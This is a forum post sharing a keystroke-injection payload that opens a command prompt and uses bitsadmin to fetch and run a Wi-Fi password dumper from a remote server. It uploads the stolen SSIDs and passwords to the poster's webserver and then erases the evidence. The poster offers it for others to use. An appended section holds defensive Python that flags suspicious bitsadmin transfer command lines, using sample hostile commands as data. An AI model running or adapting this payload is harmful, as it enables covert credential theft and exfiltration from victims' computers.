crashie
Posted March 10, 2013 (edited)

Here's one contribution to add to the payload repository on the wiki. Feel free to use it.

There is one thing to have in mind though, it only works with IIS servers which have enabled BITS transfers to an "upload" folder. But the code needed is tiny once you have set up a server to receive the file/files.

Below is how I use it to download a Wi-Fi password decryptor which decrypts all the stored passwords on the target computer to a .htm file together with SSID. Then it uploads the .htm to my webserver and after that it deletes the password decryptor and the .htm file and exits.

Bitsadmin is deprecated in Windows 7 but still there and running by default :) More commonly used in Vista and XP SP2.

You can of course use it for other tools or executables that dump stuff to another file.. :)

Requirement: An IIS server with BITS server extension enabled and configured. It's easy to set up, just drop me a PM and I'll assist you.

    REM ### BITSADMIN Download/Execute & Upload payload with file erase ### --- By crashie ---
    GUI R
    DELAY 200
    STRING cmd
    ENTER
    DELAY 600
    STRING bitsadmin /transfer myjob /download /priority high http://server.com/upload/wifipass.dba %TEMP%\wifi.exe &start %TEMP%\wifi.exe wipass.htm
    ENTER
    DELAY 3000
    ENTER
    STRING bitsadmin /transfer uloaded /upload /priority high http://server.com/upload/wipass.htm %USERPROFILE%\wipass.htm
    ENTER
    DELAY 3000
    STRING erase /Q %TEMP%\wifi.exe %UserProfile%\wipass.htm
    ENTER
    DELAY 50
    STRING exit
    ENTER

Edited March 10, 2013 by crashie: formatting - added [code] tags
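
Seen from the defending side, the `bitsadmin /transfer` command lines typed by a payload like the one above show up in process-creation logging. The following is an added example, not part of the original post: Python that flags `/upload` jobs, hosts outside an allowlist, and downloads saved under an executable extension that differs from the remote one (as with `.dba` saved as `.exe`). The sample log lines, host names, allowlist and function names are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

# Constructed process-creation command lines (as logged by Sysmon Event ID 1 or
# Security 4688 with command-line auditing). Hosts and paths are placeholders.
SAMPLE_CMDLINES = [
    r"bitsadmin /transfer myjob /download /priority high http://server.example/upload/tool.dba %TEMP%\tool.exe",
    r"bitsadmin /transfer up1 /upload /priority high http://server.example/upload/out.htm %USERPROFILE%\out.htm",
    r"bitsadmin /transfer wsus /download /priority normal https://updates.corp.example/agent.msi C:\Install\agent.msi",
    r"cmd.exe /c dir C:\Users",
]
ALLOWED_HOSTS = {"updates.corp.example"}  # assumption: site-specific allowlist
EXEC_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js"}

TRANSFER_RE = re.compile(
    r'bitsadmin(?:\.exe)?"?\s+/transfer\s+(?P<job>\S+)'
    r'(?:\s+/(?P<type>download|upload))?(?:\s+/priority\s+\S+)?'
    r'\s+(?P<remote>https?://\S+)\s+(?P<local>"[^"]+"|[^\s&|]+)',
    re.IGNORECASE,
)

def analyze(cmdline):
    """Return a finding dict for a bitsadmin /transfer command line, else None."""
    m = TRANSFER_RE.search(cmdline)
    if not m:
        return None
    direction = (m["type"] or "download").lower()  # /download is the default type
    url = urlparse(m["remote"])
    host = (url.hostname or "").lower()
    local = m["local"].strip('"')
    remote_ext = PureWindowsPath(url.path).suffix.lower()
    local_ext = PureWindowsPath(local).suffix.lower()
    reasons = []
    if host not in ALLOWED_HOSTS:
        reasons.append("host-not-allowlisted")
    if direction == "upload":
        reasons.append("upload")
    if direction == "download" and local_ext in EXEC_EXT:
        if remote_ext != local_ext:
            reasons.append("renamed-to-executable")
        if re.search(r"%temp%|\\appdata\\local\\temp\\", local, re.IGNORECASE):
            reasons.append("executable-in-temp")
    return {"job": m["job"], "direction": direction, "host": host, "reasons": reasons}

def scan(cmdlines):
    return [f for f in map(analyze, cmdlines) if f and f["reasons"]]

if __name__ == "__main__":
    print(*scan(SAMPLE_CMDLINES), sep="\n")
```

The allowlisted `.msi` download and the unrelated `cmd.exe` line produce no finding; in practice the allowlist would hold the update and deployment hosts that legitimately use BITS in the environment.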